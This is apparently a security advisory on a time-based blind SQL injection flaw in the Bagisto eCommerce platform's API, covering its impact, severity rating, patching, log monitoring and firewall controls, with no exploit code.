A high-severity vulnerability has been identified in the Bagisto eCommerce platform, which could allow an unauthenticated remote attacker to access and exfiltrate sensitive database information. Successful exploitation could lead to the theft of customer personal data, order history, and other critical business information, posing a significant risk to data confidentiality and organizational reputation.

The vulnerability is a time-based blind SQL Injection flaw present in a publicly accessible component of the application's API. Due to improper sanitization of user-supplied input, an attacker can send specially crafted HTTP requests to the affected endpoint. This allows the attacker to inject malicious SQL queries that cause the database to perform time-intensive operations, enabling them to infer database content, character by character, based on the server's response time.

This vulnerability is rated as High severity with a CVSS score of 7.1. Exploitation could lead to a significant data breach, exposing sensitive customer information (e.g., names, addresses, contact details) and confidential business data (e.g., sales records, product information). Such an incident could result in severe reputational damage, loss of customer trust, regulatory fines under data protection laws like GDPR, and potential financial losses associated with incident response and recovery.

Immediate Action: Apply the security updates provided by Bagisto across all affected instances immediately. Prioritize patching for internet-facing production environments. After patching, review web server and database access logs for any signs of exploitation attempts that may have occurred prior to the update.

Proactive Monitoring: Security teams should actively monitor web application firewall (WAF), web server, and database logs for anomalies. Look for suspicious requests containing SQL keywords (e.g., SELECT, UNION, SLEEP, BENCHMARK) or patterns indicative of SQL injection attacks. Monitor for unusual response times from the application, which could indicate time-based exploitation attempts.

Compensating Controls: If immediate patching is not feasible, implement a Web Application Firewall (WAF) with strict rules designed to detect and block SQL injection attacks. Restrict access to the vulnerable application component if it is not essential for public operation, though this may impact functionality.

Public Exploit Available: false

Given the high severity (CVSS 7.1) of this vulnerability and its potential impact on a critical eCommerce platform, we recommend treating this as a high-priority issue. Although not currently listed on the CISA KEV catalog, the risk of a data breach is substantial. Organizations using affected Bagisto products should apply the vendor-provided patches immediately, adhering to their critical vulnerability patching timelines (e.g., within 7-14 days).